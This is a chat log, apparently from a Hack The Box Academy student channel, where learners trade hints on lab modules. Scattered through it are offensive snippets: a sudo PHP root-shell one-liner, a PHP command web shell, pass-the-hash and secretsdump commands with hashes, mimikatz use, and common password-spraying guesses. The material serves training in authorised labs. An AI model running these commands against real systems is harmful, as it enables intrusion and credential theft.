but setting up isn't anything "complex" at all

it's literally just a simple thing to help you set up your own system and such

Already before

Did you work this out?

Nope. I just moved to other module

Damn. I will try to reset and try again

If you get it, please let me know

uhh how do i escalate root privileges

got hella confused again

are you running it as admin

Yeah when I used RDP i tried both running cmd as admin and running it from there but also right clicking mimikatz and running as admin.

I went another way around the task and solved it. I used impacket to do the PTH for Administrator and then opened a PS session and ran mimikatz, then execute sekurlsa::msv

I am almost finish with the linux priviledge escalation! Having a hard time to find flag5!

if you're running as admin and the user has the rights it wouldn't retrun access denied

oh nvm got it

I am trying to upgrade de shell with the busctl commands but nothing happens... how do I know that I running the program correctly?!

type whoami

or id

I got the stable shell, now I want to elevate to root

got it 🙂

thanks anyway!

wait i do wget <ip address>/LinEnum.sh

but it says access denied

with python3 -m http.server 80

thought i had it 😔

uhh it shows me this

thats it
and the error from the server is

this

oh

Is the Skills Assessment in Session Security Broken? I am trying to access http://minilab.htb.net/submit-solution?url=http://<MYIP>:<PORT> however i get an error something went wrong.

hm alright
i see
imma try elsewhere

is there like a certain place i should be executing it or it doenst matter where?

/tmp/ for downloads usually works

As it's world writeable

alright

o thank you

You were trying to write to a user's home

hm

As not that user

www-data != mrb3n

I tried running ||Invoke-SMBExec -Target DC01 -Domain inlanefreight.htb -Username david -Hash c39f2beb3d2ec06a62cb887fb391dee0 -Command "dir" -Verbose || through my RDP session but it gives me this.

I've tried numerous other ways but I believe that it must be run from the "initial access" machine.

holy shit it worked
now what?
the scan is complete

do i execute something with sudo?
or will that still not work

lemme try

nvm

Chmod +x

yup
and then ./LinEnum.sh yes?

You need to make it executable

Yes, sudo not required

ye i did

it scanned

Then just analyze the info, for what's probable

alright
lets see

interesting files :
/usr/bin/nc
/usr/bin/netcat
/usr/bin/wget
/usr/bin/curl

wait meaning of probable?

accessed?

oh i see

thank you

anything i should be looking for? like config files or?

oh alright thank you

alot of config files

hmmmm

give me another hint about that script

if possible

oh
its uhh cracking into HTB/getting started/knowledge check

Will try, thanks!

oh nah

oh wait you mean
sudo -l?

ye i did just a little before you asked
im trying to remember the script

was it like
sudo -u <user> "<path shown>"

i dont remember it

(ALL : ALL) NOPASSWD: /usr/bin/php

alright thank you

yeah thats the first thing that came up

smb signing required from the client so cross-protocol not possible there, webdav not running, still stuck a bit

do you still need help

i tried using this one CMD="/bin/sh"
sudo php -r "system('$CMD');"

but seems like its wrong

do i have to replace anything?

oh shit wait

RAAAAAHHHH

i think i did it

FUCK YEAH DUDE

HOLY SHIT THIS TOOK A WHILE BUT IT WAS FUN AS SHIT

alright tomorrow im starting the basic toolset

That dopamine hit that keeps bringing me back for more. 😂

😂
that was exciting dude
shit was actually hella fun

hell yeah

if it was easier it wouldnt be as satisfying

For NTLM Relay Attacks - Skills Assessment, the second question/task is to compromise the BACKUP01 server. My understanding is below, but I'm stuck on moving forward

||I have used the mozhar account via ntlmrelay/responder to get smb access to the backup01 server, but couldn't write files and didn't see anything that helped so far. I have the sql_ftp_test account which provides me domain access, but I seem to be unable to coerce any auth with coercer/printerbug/petitpotam/etc, and unable to drop files anywhere. Noticed signing is disabled but not picking up any meaningful auths without coercion either. Tried adding shadow creds to mozhar but denied. Clients require signing so coercing auth from smb to cross-protocol isn't helpful. What am I missing?||

wait was that like basically how hackers get into something related to databases or some shit like that?

Any really good with proxychains? I'm trying to load a website via proxychains but it's not loading

I don't consider myself an expert, but I can try to help you

Currently I'm in an internal network and I know have network access because I can run proxychain nmap from my attacker host successfully

Not sure what I am doing wrong

I've sent you a DM, lets talk there to avoid flooding the chat

you can create something with the current acces syou have

dont think just user accounts.

Hey guys I am currently following the Windows Privilege Escalation module and on the SeTakeOwnershipPrivilege tab

The question states:
Leverage SeTakeOwnershipPrivilege rights over the file located at "C:\TakeOwn\flag.txt" and submit the contents.

I tried the various methods listed in the lesson but they don't seem to work and i am running out of any other ideas.

I thought maybe it has something to do with not having the SeTakeOwnershipPrivilege rights so maybe a bug?

I created a || computer account || and didn't notice any new access/capabilities from there (edit: I can coerce now but insuff privs to set shadowcreds / etc for those servers)

Hey everyone, I am having issues with the privilege escalation on the nibbles box, || when I try to sudo the program to get root access it just gives an error saying unknown:I need something more specific and says it didn't found [[||

Can somebody help me understand why in the module Active Directory Enumeration & Attacks, section Bleeding Edge Vulnerabilities, when using the PetitPotam approach, he uses the LM+NT hash when dumping secrets, how he obtained the LM hash? I can't find it anywhere (I know that the NT hash is from calling /opt/PKINITtools/getnthash.py)

secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c...04fe:313b6...b4ba

Edit: LM hash isn't required, but still...

ok, when you coerce, make sure you have the right IP's , you can get something from this

quick question, you know how everytime you hack a HTB lab, you have to connect to the vpn given. How does that work in the real world like do you have to be connected to a certain vpn to do hack or.. Like why do we have to connect to hack the box open vpn to hack the lab.

Because the labs are hosted privately

And it depends

You can't just access the 10.129.x.x private network that the labs are on, as again private network as opposed to a public ip and port of some web modules

How does it work in the real world?
It depends - you may have a dedicated connection to do the assessment. you may be working through a dropbox, or the company allows your testing device throuhg their VPN/Zscalar/firewall, etc.

For example

Or you may be tasked with breaking in through their external web server

allegedly lets say I wanna hack my neighbour can i just do it from my vpn

You need some form of access to their network

You can't just "hack them"

So you cant do it remotely like you do on HTB liek if you get their ip can you do it

if you have their ip*

You'd need more than the ip

You'd need an exposed service to break in through

But most home networks aren't set up the same way as a corporate network

In a home network each device is their own entity

As opposed to an office where they belong to the same entity

I also suggest refraining from making illegal hypotheticals

How else would I phrase it legally - for my own knowledge i wanna know out there how it really works

You have some scope that allows access either to their exposed web server, directly to their internal network, somewhere in between

There's not much to figure out how it really works; from the perspective academy the tester (you the student) have been granted access to the exposed web servers within their DMZ (10.129.x.x) some of those servers have access to a separate VLAN network (172.16.x.x --> 172.31.x.x) from which, more sensitive servers and workstations may reside

Can you not encrypt a file on Linux, then decrypt on windows?
And visa versa.

ofc you can

I am on the footprinting module in the IPMI section. I got the user's hash. I am trying to crack it with hashcat. I am put just the hash in a file called "ipmi.txt". The syntax I am using is "hashcat -m 7300 ipmi.txt /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt" the contents of my hash match the example of the hashcat wiki. the error I am getting is "Hash 'ipmi.txt': Separator unmatched
No hashes loaded.
"

I tried adding in the username:hash

but that didnt work either

This website shows you example formats for various encryption types. https://hashcat.net/wiki/doku.php?id=example_hashes

it should look something like the example they provide 08b017f3628b9835c748521e412429c9:f3450000df540000cdd981b0b3441be8774a61e69321291891a29a0c5fdac3f06194bd2c29fa5246000000000000000000000000000000001400

But not with the methods shown in the file sending module?

Sorry not sure what you're asking.. I don't recall any encryption/decryption related stuff in the file transfer module. I could be wrong because it's been a while since I did it. Do you need help with a section in that module?

The protected files section.

I completed the module, but I noticed we encrypt/decrypt with powershell, then encrypt/decrypt with openssl on Linux.

The whole point of encryption is to send from one to the other.

ahh yeah

so you answered yourself right there

both linux and windows can encrypt/decrypt

you can also just install openssl in windows

that powershell script that it provides, you can use -mode decrypt to decrypt instead of encrypt. ```Invoke-AESEncryption -Mode Decrypt -Key "p@ssw0rd" -Path "example.txt.aes"

thats the format it is in currently

Right.
We can encrypt with that powershell script then decrypt with that powershell script.

I’m saying can we encrypt with powershell then decrypt in Linux. And visa versa.

You mentioned installing openssl on windows, but we may not have the ability to install programs.

yeah you can use the PS script to decrypt aes

you can also just write your own powershell script. powershell can pretty much do anything, it's .NET under the hood

It didn’t work when I tried.
Maybe I didn’t enter it correctly.

https://academy.hackthebox.com/module/113/section/2164
why isn't the ftp letting me to download the jar file? any help please

never mind gotta enable file download in internet explorer zone settings

I ran it on the pwnbox instead of my kali vm with the same excact hash, same exact command. Literallly copied and pasted everything over. It worked on the pwnbox. Weird

anyone else with kali 2024.2 have issues running hashcat?

i run hashcat on my main workstation instead of my vm, so i can utilize those nvidia cuda cores lmao

i noticed its running the lastest version compared to the pwnbox which is a version older

doesn't matter, the hashes will be the same

make sure you've copied the whole line from the output

I did. I copied everything from my kali VM where i kept getting an error about not being : seperated. To the pwnbox and everything worked. Didnt change a thing except for the VM

try manually typing, i've only ever seen that error if the hash isn't correct. also double check the mode you used, if you chose the wrong mode it will cause that error to because it's expecting a different hash format.

since you copied it there could be some invisible characters

i had to uninstall the newest v6.2.6 and install v6.1.1

got it working on my kali vm after that. /shrug

I’m still trying to figure out how to encrypt a file on Linux, then decrypt it on windows…

which part can't you do

The decryption.
If you encrypt a file with openssl on Linux, you can’t decrypt it with powershell.
Or visa versa.

what encryption type

I assume the type in the module is aes.

Try this in linux: ```# OpenSSL: AES Encryption Command
openssl enc -aes-256-cbc -salt -in /path/to/file.txt -out /path/to/encrypted_file.txt -k YourStrongPassword

OpenSSL: AES Decryption Command

openssl enc -d -aes-256-cbc -in /path/to/encrypted_file.txt -out /path/to/decrypted_file.txt -k YourStrongPassword

try this in powershell: ```# PowerShell: AES Encryption Script
$InputFile = "C:\path\to\file.txt"
$OutputFile = "C:\path\to\encrypted_file.txt"
$Password = "YourStrongPassword"

$Aes = New-Object System.Security.Cryptography.AesManaged
$Key = [System.Text.Encoding]::UTF8.GetBytes($Password.PadRight(32).Substring(0, 32))
$Iv = [byte[]](1..16 | ForEach-Object {0})

$Aes.Key = $Key
$Aes.IV = $Iv

$Encryptor = $Aes.CreateEncryptor()
$FileStream = [System.IO.File]::OpenRead($InputFile)
$EncryptedStream = [System.IO.File]::Create($OutputFile)
$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($EncryptedStream, $Encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)

$Buffer = New-Object byte[] 1024
while (($BytesRead = $FileStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
$CryptoStream.Write($Buffer, 0, $BytesRead)
}

$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStream.Close()
$EncryptedStream.Close()

PowerShell: AES Decryption Script

$InputFile = "C:\path\to\encrypted_file.txt"
$OutputFile = "C:\path\to\decrypted_file.txt"
$Password = "YourStrongPassword"

$Aes = New-Object System.Security.Cryptography.AesManaged
$Key = [System.Text.Encoding]::UTF8.GetBytes($Password.PadRight(32).Substring(0, 32))
$Iv = [byte[]](1..16 | ForEach-Object {0})

$Aes.Key = $Key
$Aes.IV = $Iv

$Decryptor = $Aes.CreateDecryptor()
$FileStream = [System.IO.File]::OpenRead($InputFile)
$DecryptedStream = [System.IO.File]::Create($OutputFile)
$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($DecryptedStream, $Decryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)

$Buffer = New-Object byte[] 1024
while (($BytesRead = $FileStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
$CryptoStream.Write($Buffer, 0, $BytesRead)
}

$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStream.Close()
$DecryptedStream.Close()

2 scripts in that block, one to encrypt one to decrypt

let me know if it works

powershell is just .NET under the hood so you can do whatever

lol I’m not sure you’re understanding my issue.
I can encrypt and decrypt on the same system as you’ve just shown.

The point is to encrypt on one system then decrypt on the other system.

well maybe i just don't get what you're asking then. you said there wasn't a way to encrypt/decrypt in windows and linux.

yo any one know the answer to this question?

You probably didn't get an answer because you didn't include the module or section. You also didn't provide the OS, so we have no idea which command we could give you a hint with.

No no.

The module is about file transfer. (Send a file from Linux to windows) or visa versa.

You have to encrypt a file on Linux, then send the encrypted file to windows and decrypt it there.

i understand that

its on Current Path

Information Security Foundations | Introduction to Windows Command Line

You showed how to encrypt then decrypt on the same system.

i provided you 4 things. 1) a powershell script that encrypts in aes. 2) a powershell script that decrypts aes. 3) an openssl command that encrypts in linux with aes, and 4) an openssl command that decrypts aes. being able to encrypt and decrypt on both systems means you can encrypt on one (linux), transfer the file, and decrypt (windows) on the other box

correct, i showed you how to both encrypt and decrypt on both systems

so what am i not understanding about the problem

now that you can encrypt with linux, transfer, and decrypt in windows, what is the problem you are having

the file transfer?

Sir lol…

You can’t decrypt a file in powershell that you encrypt with openssl.

so you didn't try my script?

i think you underestimate the power of powershell lol

Is that not the script given in the module?
I’ll try your script.

no its not

its 2 scripts in that powershell block, make sure to cut it up into 2

Module: Attacking Enterprise Networks, Section: Exploitation and Privilege Escalation, Question: When I used ligolo-ng/proxychains to pivot into internal network, the host with DNN website hosted, the side bar containing "Settings" doesn't seem to load, can anyone help to troubleshoot this :/

The one with the settings bar was taken from course materials

So, I would make 2 separate ps1 files, then import them as modules?

call the script and pass the necessary parameters

``` and ```.\DecryptFile.ps1 -InputFile "C:\path\to\encrypted_file.txt" -OutputFile "C:\path\to\decrypted_file.txt" -Password "YourStrongPassword"

i take it you're logged in as ||Administrator:D0tn31Nuk3R0ck$$@123|| ?

yes i am

maybe try clicking the little gear icon?

that might be how to access Settings

the first picture is the one that im currently looking at

there is no icon on the left bar

^

after you log in , try navigating directly to http://172.16.18.20/Activity-Feed/userId/1

still the same issue 😦

try disabling your extensions, try private mode, try another browser, try CTRL + F5 to refresh and clear your cache

i highly doubt it's due to your tunnel to the site, if so don't use that way and use netsh or something to port forward

or try zooming in / out

or try searching for Settings

with the little magnifying glass icon

give me a few minutes and i will fire up the lab

It shows no result found

let me try this too

go back to the root of the website . So just http://172.16.8.20

and click the gear icon

yeah that too

on the left hand side of the screen

SQL Console should be an option

Its not there though

ok it finally loaded

thanks @west canopy @cloud urchin

np 😉

I’m getting an error…

paste the script into chat gpt, then paste the error see if it can fix it

i dont know powershell that well

i'm positive it can be done though

the provided (from the module) script has parameters to decrypt not sure why it wont work for you

Have you tried it yourself?

your're missing command line arguments i think

.\DecryptFile.ps1 -InputFile "C:\path\to\encrypted_file.txt" -OutputFile "C:\path\to\decrypted_file.txt" -Password "YourStrongPassword"

oh yeah that too lol

All that stuff is inside the script.

I am on the Linux Fundamentals / Filter Contents Module / Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. I cannot seem to get the right number of unique paths. I have || 20 || utilizing a series of ||grep, awk, and cut||. I appreciate any assistance with this. Thank you.

[HTTP ATTACKS - HTTP RESPONSE SPLITTING]
Hey guys!
Currently working on question of this section. My payload worked for user, but still struggling with admin.
Can I have a nudge?

I had a hard time with that also. I forgot which command I used but one of these may work.

https://forum.hackthebox.com/t/linux-fundamentals-filter-content-filter-all-unique-paths-of-domain/270162

hello amigos. I have difficulty in understanding this statement (SSTI example 3 module):

The application successfully evaluated this expression as well. According to PortSwigger's diagram, we are dealing with either a Jinja2 or a Twig template engine. That being said, the fact that {{7*'7'}} was evaluated with the application returning 7777777 means that Jinja2 is being utilized on the backend.

How he can jump from one sentence we are in Jinja2 or Twig and then just say it is jinja2. Would it be possible to find this info from wappalyzer for example?

Im not familiar with web apps but will the two engine evaluate the bracketted operation differently?

7 times a character of 7

Im looking at twig operand examples none of them show multiplying a character it’s always between two numbers

I assume there’s going to be errors if it’s in twig
Whereas jinja has no issue because this is valid in python

Here is the answer from HackTricks

In twig, {{7*'7'}} = 49

Where in Python '7' is interpretated as a char and not a digit

Interesting it auto recognise it as int

C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25 instead of rdp i want to use evil-winrm i replaced port 3389 with 5985 but i can't use evilwinrm

i was able to use rdp

applying the pivoting module knowledge in AD skill ass 1

Are you sure your connectAddress is correct ?

above command is from pivot module , i just use that command for refrence here , real command have diff ip

Maybe this port isn't open on the target

i can rdp to other machine but that is soo laggy , that why i want to know why does evil winrm didn't work

oh

Or your winrm doesn't go on 8080 port

I can't help more as you are farther than me in your path

oh now it worked with evilwirm

I'm practicing the HTTP Method: POST lab, I have connected to the HTB VPN successfully but unfortunately I can't login to the URL and when entering the credentials I'm having the above error. What could be the problem can anyone help me with this?

Hello , i am stuck on kerberos attacks ( Unconstrained Delegation - Computers ) question number 2 "5 Compromise the Domain and read the content of \DC01\C$\Unconstrained\flag.txt "
can anyone help me please

Hello, I am a university student pursuing cpts after my oscp, & I am struggling with htb academy's domain fuzzing section. Bruting subdomains and vhosts have not been an issue for me in the past. However, upong using ffuf or wfuzz against this infrastructure the only thing i come upon are errors.
https://academy.hackthebox.com/module/54/section/502

Has anyone else experienced this issue before?

I am unsure why i cannot achieve this section after coming back to it for 2 days now. I have added the target and its respective ip to /etc/hosts & ran various ffuf/wfuzz commands against it but recieve errors in the end.

i feel like the infrastructure is broken but i could very well be wrong

Heyo, not really looking for help but just wondering where i can make suggestions about some content in the File Transfers > Catching Files over HTTP/S.

The module states that it will cover creating a secure webserver for upload operations but then proceeds to cover the subject only in HTTP.
I kind of feel this is a ton more work than just using the python uploadserver module as described earlier in the module and without the benefit of actually being secure.

On a side note, would anyone be free to dm/chat about modifying this to actually run over https and what steps it would require?

There is a lot of example out on the internet
https://realpython.com/python-http-server/

There is a section explaining. How zo run secure aswell

Thanks for the hasty reply 🙂 i'm well aware of the python https stuff but i was hoping to more concentrate on nginx and expand on what i was learning in this section of the module, and as previously stated i just wanted to make suggestion that the module was not infact covering secure http communications. I have figured it out now and got it working over https but again thanks for the assist 🙂

#1234357888114364508 is probably the way to give spelling mistakes or missing content. Doesnt mean they will add it at the end of the day

oh perfect! thank you i thought that was something else entirely different

Is winrm even running on the system you're trying to access?

ofc

now it run i had to reset the machine , these machine are buggy

I'm doing file inclusion module and sometimes we need the base64 encode some of the strings such as echo '<?php system($_GET["cmd"]); ?>' | base64 for data wrappers

why is that tho? why do we have to base64 encode the strings?

Because of how the backend interprets it

Is it only for Data Wrappers? Because for input and expect wrappers we don't need to encode the strings

uhh is it wrong if i executed nmap -sV <target>
instead of very specific filters?
i still found what i needed to answer the questions but just asking

I guess it's not wrong. You don't need very specific filters unless its necessary

but learn why and where to use others for specific tasks

Not really

It's a thing you can do

oh alright thats good
just making sure

It's not like it's running any malicious script

ye

hmm

Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.

on enumeration with nmap

i tried using nmap -sV -A <target>

but i havent gotten the flag
must be wrong then

Did you check the version column?

Also reminder, tell us what module and section you're working on

Firewall and IDS/IPS Evasion - Hard Lab

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-18 09:03 EDT
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 99.99% done; ETC: 09:04 (0:00:00 remaining)
Nmap scan report for 10.129.159.59 (10.129.159.59)
Host is up (0.064s latency).
Not shown: 869 closed tcp ports (conn-refused), 129 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 71:c1:89:90:7f:fd:4f:60:e0:54:f3:85:e6:35:6c:2b (RSA)
|   256 e1:8e:53:18:42:af:2a:de:c0:12:1e:2e:54:06:4f:70 (ECDSA)
|_  256 1a:cc:ac:d4:94:5c:d6:1d:71:e7:39:de:14:27:3c:3c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel```

oops

thought it would look much cleaner

Wrap it in ```

But anyway

What module and what section

wah wrong

brother answer the damn question

Anyone for a little nudge on the DACL II skill assessment? Specifically Q2. Q1 went ok, and I think I found most parts for Q2 but I'm still missing a piece. Been going over all the material again but still not seeing it 😅

Firewall and IDS/IPS Evasion - Hard Lab
enumeration with nmap
basic toolset

i did though before

doesnt matter

You need to do the evasion techniques described in the reading

Where?

here

Missed it behind your copy/paste log

ye

Anyway

hmm

There's a section dedicated to evasion, you'll also need to scan all ports to find what you're looking for

-p-?

You will need to also use netcat once you find the right port

oh
netcat got it

But if you don't do the evasion, you won't find it

yeah i got you
imma take a look at it rn

And if you trigger too many alerts. It'll block you and you'll need to reset the lab

There are quite a few steps that you need to go through in that lab to get to the answer but its all stuff you've covered.

imma take a look on previous modules

Its all covered within the footprinting module.

how u all remove extra space and line from hashes , tr cut sed or awk

or vi

bruh i have learned all of them sometime i think why i had to learn all method

I've just finished the parts on password spraying in the AD Enumeration & Attacks module. It doesn't talk about how to pick a password for password spraying though. Ya'll got any good advice for this?

<@&861185840277487616>

<@&861185840277487616>

EGIRL PARADISE YOOOOOO

@haughty stirrup

https://tenor.com/view/yazarkeolog-gif-19419563

For Find The Easy Pass - how to run the zip file on mac m1

so since netcat
do i have to do that SYN scan?

hello, im having a hard time understanding what broadcast address and network address are? and whats their purpose in the subnet?

Scan first to find the right port first.

Network address defines what systems it can talk to, broadcast would send packets to all devices on that subnet

how do i know which is the right port? 😭
will it show me something like a version or whatever

In a /24, 192.168.0.0 and 192.168.1.0 are two different networks

It will stand out

alright

I suggest not doing a script scan to make it cleaner

Modules never disappoints

What module?

so a network address is unique to each subnet? and how exactly can i find out how they look for example the ip is 192.168.10 and subnet is 255.255.0 because there are 2 slots reserved for them?

255.255.255.0 is the mask

@haughty stirrup I need help.

Also if you're going to try and use examples use all 4 octets, not 3

yeah my bad im going to try to explain better

If you know the mask you can find out the network

https://www.techtarget.com/searchnetworking/tip/IP-addressing-and-subnetting-Calculate-a-subnet-mask-using-the-hosts-formula

Its a challenge in the beginners track called Find The Easy Pass https://app.hackthebox.com/challenges/5 sorry let me know if i am asking my doubts in the wrong room

Wrong room this channel is for academy modules, #challenges (read and follow #welcome)

oof
that shit was confusing but alright

had to google a bit for the netcat part

not "a bit" but yk
hopefully there is a netcat introduction module

There's not

dang

It's a basic network connection tool that's not really all that complex

listening and such?

I read the article but still i dont understand why the subnet mask is 255.255.255.0 in the case of the ip address 192.168.10? doesnt it go from 192.168.0-254?

hmm

Listening and connecting

very nice

192.168.0.1-192.168.0.254 are addressable

.0 is the network, and .255 is the broadcast

what is this red team role

oh yeah i think i understand. so the original ip i gave was missing an octet (because u said to use all 4), so in theory such an ip address cant exist in the first place and therfore a subnet with 3 octets cant exist too? 255.255.0 cant even exist right? and also does the network address have any purpose or is it just an identifier, like for example 192.168.0.255 broadcasts and what does 192.168.0.0 do?

Network is an identifier, broadcast sends packets to the network

like a hub?

No

A hub is a switching device

And connects multiple subnets

The broadcast only sends on its network

i think i meant if the broadcast sends a signal to all devices on the network similar to what a hub does and doesnt have any intelligence to know what ip is meant to receive the packet?

A hub is something different

well i tried using it as an analogy

Yes it's similar.

Anyone know anything about this?

Think of a simple default password

Any suggested referece/resource?

¯_(ツ)_/¯

Welcome1! Is usually a safe bet

Or [season][year]!

Alrighty, thanks. A little concerned I won't guess the right password to use for a password spraying attack if it's on the CPTS exam tho 😂

@next bronze got any suggestions for a solid resource?

I'm not at that module yet, but it seems like password spraying is different from brute forcing in that you try a single password against a bunch of user account names once each. The password used in a spray is described as a "default password" which would imply this attack works best against software packages that have some kind of default. Am I thinking about this right?

sorry guys, I have a private little ctf that I need help with...how can I receive help? it should be really easy for you guys 😄

nope, you don't even do it irl because it will usually miss, the only time it's reasonable to do it is when you have solid intel on a potential password

hey guys, I am stuck in the Attacking Thick Client Applications section in Attacking common application module, I couldn't find the file that have the magic bytes MZ in x64dbg

Ah, alrighty. Noted.

Ah, so, like that one password that everybody in the office uses for everything because that's what they were taught to do. That sounds good too.

yeah only when you know what it could be, otherwise there's pretty much no chance of success

Enum the new user script for default password

yeah something like that

ChangeMe123!

Oh, that's helpful. Thanks.

There's usually some admin policy somewhere

well usually if you're looking for a foothold you won't find those

unless there's some ctf fuckery going on

English

I am trying to make the binaries for kerbrute, as laid out in the AD Attacks module and keep getting this error when trying to make all. I really don't know what to make of it. Anyone else getting this error?

it means go isn't installed

go being the programming language

Ok that's what was I thinking, definitely thought I had it installed though, thanks

Hey i want some advice

ask google /s

Ive been going through few machines on HTB and they labled as easy and its prety much insane for me i just couldnt find out how to complete each step

Google, research, but this channel isn't for machines

read and follow #welcome to access more channels

Hello, why does multicast only works with the SSDP protocol? cant it be used with http + udp instead? and why can it only be utilized with specific ipv4 and ipv6? (i already searched in google but couldn't find an answer to these specific questions)

Multicast works with more than SSDP. There are situations as well where one would utilize multicast, HTTP and UDP as well. For example, watching a streamer on twitch. We'd use HTTP to connect, The server instructs the client to join a specific multicast group, (IGMP for IPv4 or MLD for IPv6). Then the server starts sending packets over UDP. We use UDP because it is faster and more efficient for continuous transmission of large volumes of data

thanks, so its not limited to just ssdp

Guys, is there any ways to earn cube for free ?

Referral I think?

Np, and yes that’s correct! Multicast is a method of data transmission to multiple clients. While, SSDP uses multicast for service discovery

oh tysm lemme try

The person you refer has to purchase cubes in order for you to get cubes iirc.

Hello again, I feel like I give a lot of questions here, but this is really only way for me to get answers and sleep at night. https://academy.hackthebox.com/module/116/section/1512 in this module, I couldnt get the flag. Let me explain what I did so far: I used subbrute and found ns1 server and tried to dig it using "dig axfr ns1.. @IP" but there is nothing, sometimes I get connection timed out and sometimes it doesnt even work, I need to know if I am on true path or not. also if possible, a little bit detailed guide, because I am lost. Oh also, I still dont get what is the point of using resolver.txt in subbrute. Any help appreciated

I can only help with resolver.txt. Have you read subbrute's github page? It mentions resolver.txt in the first paragraph of the readme.md. How do you understand the function of resolver.txt currently?

tbh I checked readme.md now, but didnt see anything about resolvers.txt. Also it is full of ip addresses in github repo, idk why. I really dont understand point of it.

Ok, you're right. It mentions using "open resolvers" to avoid rate limiting. resolvers.txt contains a list of DNS resolvers to use.
https://github.com/TheRook/subbrute

Do you have an additional question?

ohhh alr, I get it now.

no, thanks for help, there is no other question about subbrute.

some modules have ez ans

A lot of the sqlmap ones are easy

greetings, can someone give me a hint for footprinting medium challange. i found creds for username with letter a, and password for ssms sa user. it seems that user with letter a dont have access to database. i found another user with litter d but i dont know its password. so i enumerate both shares and successfully rdp connection but what did i miss and where to look at it?

Perhaps the sa password is reused

i dont belive it haha, thanks

I have a question as to why this is relevant to batman.

now i can stop hydra at 10k combinations

Maybe he just likes superheroes

There's generally not a lot of rhyme/reason to the chosen passwords

Haha, thanks, but with over 9 w of data, ssh would be down under normal circumstances!

Don't attack ssh 😉

No, I read in other information, is SSH hit, Ftp is able to carry on blasting?

how do you guys send images tho? it dont let me do that

Sorry I kinda forgot, you need to be tied to an account to send photos it seems!

Oh okay, thanks partner. let me do that

Read and follow #welcome

Delete the images bc spoilers

But ssh is slow af; attack a different port from ssh is what I meant

But the point is you can bruteforce a different service; the question doesn't state you have to attack ssh

Just to bruteforce his pw, then log in with ssh

I also suggest saving any username:password combos you find

Okay, I'll try.

And with some other services you can use as many as 48 threads

File inclusion inclusion automated scanning, page doens't give any paramters or anything other than just a plain ip address but when we fuzz it it adds index.php. where is it coming from? I mean why did we add index.php and not something else

like x.x.x.x:1010 this is the page and there's no button or link no nothing but we gonna ffuf it and url is being x.x.x.x:1010/index.php?FUZZ=value

i know it's a dummy question but i didn't get it

Can you try to use another dictionary? Or make sure the syntax of the command is not wrong, if I remember correctly you could try using the view

Yeah I was able find the view and it's value. what i didn't understand is. where index.php is coming from because seems like we added it out of nowhere

index.php is the default page, don't bother with that!

oh okay lol, thanks a lot!

refueling

Is my current thinking correct?

I don't seem to have any luck with the official account password I was given, I haven't done the hash yet.

you can loop over usernames instead of passwords for a more effective brute force

Did you get it? Im having the same problem, nothing is running on port 8888

Can anyone give me a nudge?: AD Enumeration & Attacks - Skills Assessment Part II - [Q 7] "Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host".
I'm trynig impacket-mssqlclient

once you login with mssqlclient. will need to get crackin with xp_cmdshell and move some tools that can help you

i used nc to get a "cleaner" shell to work through it

nc.exe

many ways to crack an egg

dont get hung up on one way for priv esc, if you having troubles, use the next one

haha

but there are tools referred to by having a certain SE...Privilege

they don't explicitly tell you how to use those tools in the module though

yea, which i think was a miss on their part.

but RTFM, haha

the tools are not that bad, but can be intimidating imo if new new to it

they're well enough documented

just threw it at /feedback

ok. will do later

thanks bro

I'm doing the footprinting medium lab. I've RDP'd in. Logged into SQL query... and can't figure out the query to get HTB pass... I feel like I'm so close yet the accounts populates nothing.. I feel like I have the priviledges and am looking in the right area... but idk

well if you're using the GUI app; just click around otherwise google enumeration stuff with SQL

mission click around initiated

you can also run a query from within the GUI fwiw, but if you don't know SQL queries -- just click around

I mean I know em' enough. There has to be some trick or something

SELECT * from dbo.accounts just shows me columns

even do select count(*) from dbo.accounts; and shows 0

Maybe you're looking in the wrong places

Or maybe you're misunderstanding

Do you mean it shows you the columns with info?

Perhaps you can look where you need to be

I hate everyone

i got it lol so stupid

basically they put decoy account tables

Not really

precisely

Iirc that's just a default table

you're a default table

Rude

Go calm down elliot

I can't believe how long that took me

I hate sql and the family it came from

Mssql is a mess

Mysql/MariaDB is much cleaner

Most enum commands work the same/similar though

yeah, I've used mysql much more. I definitely learned somethings tho

side note, how can I get vim to let me copy paste

pasta why's it no work

https://monovm.com/blog/how-to-copy-cut-paste-in-vim/

Google my friend or even vim-tutorial

ty ❤️ i'm braindead atm that was exhausting

I'll check back on that later

Hey all, I have what is hopefully a quick question about module 54 section 485 (Directory Fuzzing). I've looked around in this server and on google, and I really just can't get a straight answer... where do you find the results of running ffuf? Seems so stupid obvious but I'm just not seeing anything

Are you getting spammed with stuff back?

Module: AD Enumeration & Attacks
Section: Credentialed Enumeration - from Linux
I don't recall when we identified the user svc_qualys as a domain admin. I do recall obtaining this user's password using LLMNR/NBT-NS poisoning in this section, but that's it. Anyone got any idea?

it pretty much tells you in the paragraph, you need to obtain creds from memory

what tools can get credentials from memory or impersonate people?

No, that's referring to the enumeration we performed above this paragraph. But it's saying that we've previously identified the account as a domain admin.

